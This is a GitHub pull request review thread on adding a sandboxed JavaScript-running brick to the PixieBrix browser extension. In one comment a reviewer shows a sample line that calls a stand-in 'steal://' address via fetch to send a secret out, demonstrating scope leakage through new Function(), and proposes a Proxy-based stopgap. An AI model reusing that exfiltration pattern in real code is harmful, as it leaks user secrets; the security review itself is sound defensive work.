6657: add a javascript brick
pixiebrix/pixiebrix-extension pull request #6702
Opened 2023-10-25 17:32 UTC by grahamlangford

## What does this PR do?

- Closes/Fixes/Part of #123
- _Are there other changes (e.g., refactoring) included that aren’t from the ticket?_

## Reviewer Tips

- _What order should the reviewer review the files in?_
- _Are there any implementation approaches you want feedback on?_

## Discussion

- _Were there multiple approaches you were deciding between?_

## Demo

- _Paste a screenshot or demo video here_

## Future Work

- _Work for the issue/ticket that will be in a follow-up PR_

## Team Coordination

_Leave all that are relevant and check off as completed_

- [ ] This PR requires security review
- [ ] This PR introduces a new library: double check it's MIT/Apache2/permissively licensed
- [ ] This PR requires a node/npm version update: let the team know on #engineering
- [ ] This PR requires a documentation change (link to old docs)
- [ ] This PR requires a tutorial update (link to old tutorials)
- [ ] This PR requires a feature flag
- [ ] This PR requires a environment variable change

## Checklist

- [ ] Add tests
- [ ] New files added to `src/tsconfig.strictNullChecks.json` (if possible)
- [ ] Designate a primary reviewer

2023-10-25 17:33 UTC, grahamlangford commented on src/pageEditor/exampleBlockConfigs.ts
Hiding whitespace will make this file much easier to review.

2023-10-26 14:42 UTC, grahamlangford commented on src/pageEditor/exampleBlockConfigs.ts
Hiding whitespace makes the changes here easier to follow. Just converted an ever-growing series of if statements to a switch statement for readability.

2023-10-26 14:45 UTC, grahamlangford commented on src/utils/postMessage.ts
> +// Temporarily disabling until a fix for the error thrown by the sandbox is found
Awaiting fix here: https://github.com/pixiebrix/pixiebrix-extension/pull/6731, which is awaiting https://github.com/fczbkk/css-selector-generator/pull/577

2023-10-26 14:53 UTC, twschiller commented on src/bricks/transformers/javascript.test.ts
> +  runUserJs: jest.fn(),
Instead of having a dummy mock here, you could consider rewiring it to the implementation. (I.e., just skip the messenger)

2023-10-26 14:55 UTC, twschiller commented on src/bricks/transformers/javascript.ts
> +    const response = await runUserJs({
NIT: can just return the response directly

2023-10-26 14:57 UTC, twschiller commented on src/contentScript/contentScriptCore.ts
> +  void initSandbox();
I think this is OK. One thing we might consider instead is injecting the sandbox on demand

2023-10-26 14:58 UTC, twschiller commented on src/development/headers.ts
> +const EXPECTED_HEADER_COUNT = 125;
❤️

2023-10-26 14:58 UTC, twschiller commented on src/sandbox/messenger/api.ts
> +  blockId: string;
`blockId` should be a registry id

2023-10-26 14:59 UTC, twschiller commented on src/sandbox/messenger/executor.ts
> +    // TODO: Ensure that new Function() doesn't have access to the scope
Which scope is this referring to? That it can't reference the code/data/etc?

2023-10-26 15:00 UTC, grahamlangford commented on src/bricks/transformers/javascript.test.ts
> +  runUserJs: jest.fn(),
I was focusing on the responsibility of the transform function here: calling the already tested `runUserJs` function with the right arguments and not catching/throwing away errors.

As you say, I don't think it's necessary to test the implementation here.

2023-10-26 15:00 UTC, twschiller approved these changes
Looking good overall

2023-10-26 15:02 UTC, grahamlangford commented on src/bricks/transformers/javascript.ts
> +    const response = await runUserJs({
Good catch. I think that's an artifact from doing some logging earlier.

2023-10-26 15:04 UTC, grahamlangford commented on src/contentScript/contentScriptCore.ts
> +  void initSandbox();
I have a question related to this. We call `await loadSandbox()` in `src/sandbox/messenger/api.ts`. Do we even need this?

2023-10-26 15:09 UTC, grahamlangford commented on src/sandbox/messenger/api.ts
> +  blockId: string;
I took that from the typing of `PropError`, I'll update that typing as well.

2023-10-27 08:46 UTC, fregante commented on src/sandbox/messenger/executor.ts
> +    // TODO: Ensure that new Function() doesn't have access to the scope
The javascript scope:

<img width="578" alt="Screenshot 1" src="https://github.com/pixiebrix/pixiebrix-extension/assets/1402241/4512ae7e-b28c-491e-8337-5c0d9cb4307f">


Any identifier available on the line of `new Function` is also available in the function generated:

```js
const secret = 1234
const string = 'fetch("steal://secret/" + secret)'
const fn = new Function(userProvidedFunction)
```

is equivalent to:

```js
const secret = 1234
const fn = () => fetch("steal://secret/" + secret)
```

With webpack's scope hoisting, everything in the `distribution/sandbox.js` file might be available to the user function. Since the sandbox lives in a `chrome-extension://` page this means it probably also has access to `chrome.runtime.sendMessage` and `chrome.storage`

2023-10-27 08:55 UTC, fregante commented on src/sandbox/messenger/executor.ts
> +    // TODO: Ensure that new Function() doesn't have access to the scope
Also super fun _write access_:

```js
new Function('soup=1')()
console.log(soup)
// -> 1
```


Possible solution via `Proxy` https://stackoverflow.com/a/67102501/288906

We can probably use that until a better sandboxing is available.

```js
function maskedEval(src, ctx = {})
{
    ctx = new Proxy(ctx, {
        has: () => true
    })
    // execute script in private context
    let func = (new Function("with(this) { " + src + "}"));
    func.call(ctx);
}
maskedEval('soup=1')
console.log(soup)
// ReferenceError: Can't find variable: soup
```
```

2023-10-27 09:14 UTC, fregante commented on src/sandbox/messenger/executor.ts
> +    // TODO: Ensure that new Function() doesn't have access to the scope
We could alternatively rewrite the sandbox to use a Worker instead, which has very limited access to APIs, but I think/hope that native sandboxing is coming relatively soon.

https://stackoverflow.com/a/36255766/288906

2023-10-27 12:31 UTC, twschiller commented on src/sandbox/messenger/executor.ts
> +    // TODO: Ensure that new Function() doesn't have access to the scope
> Since the sandbox lives in a chrome-extension:// page this means it probably also has access to chrome.runtime.sendMessage and chrome.storage

Sure, let's check if `chrome-extension://` origin means it can access those sensitive chrome APIs. We can always re-assign/unset those APIs in the sandbox because the sandbox shouldn't be using them anyway.

For the sandbox, the main thing we're trying to prevent is data exfiltration of user browsing data or secrets. 

In the future, I could see us giving each mod its own sandbox (so we would want to create the sandbox on demand to reduce memory utilization). That way, the worst a mod could do is break its own operation

2023-10-27 13:09 UTC, fregante commented on src/sandbox/messenger/executor.ts
> +    // TODO: Ensure that new Function() doesn't have access to the scope
Given that it's easy to fix this with the Proxy, I'd advise to just copy-paste that code in the meanwhile.

2023-10-27 16:45 UTC, fregante commented
@grahamlangford You can merge this without the sandbox logging I suppose, and then I can restore it in my PR when we get a change to merge it.

2023-10-27 18:34 UTC, grahamlangford commented
> @grahamlangford You can merge this without the sandbox logging I suppose, and then I can restore it in my PR when we get a chance to merge it.

I would, but we're cutting a release soon, and I want the logging to still be in place in the release.

2023-10-28 15:49 UTC, fregante commented on src/contentScript/contentScriptCore.ts
> +  void initSandbox();
We don't need it. It's only here to prewarm the sandbox, but we can just as we well remove it. This function only ever runs once.

2023-10-28 16:02 UTC, fregante requested changes

2023-10-28 16:02 UTC, fregante commented on src/utils/postMessage.ts
> +// Temporarily disabling until a fix for the error thrown by the sandbox is found
I just realized: this piece of code cannot work. `webextension-polyfill` complains because `chrome.*` APIs are not available in the sandbox. I forgot that this `chrome-extension://` page is sandboxed via the manifest too.

In short: the sandbox logging cannot depend on the user's setting to toggle the logging. We either drop it or restore the ENV-based toggle.

I opened:

- https://github.com/fregante/webext-detect-page/issues/21

2023-11-01 16:43 UTC, fregante approved these changes
- Dropped commented/dead code
- Added TODO comment with more context
- Fixed type issue

2023-11-07 01:57 UTC, merged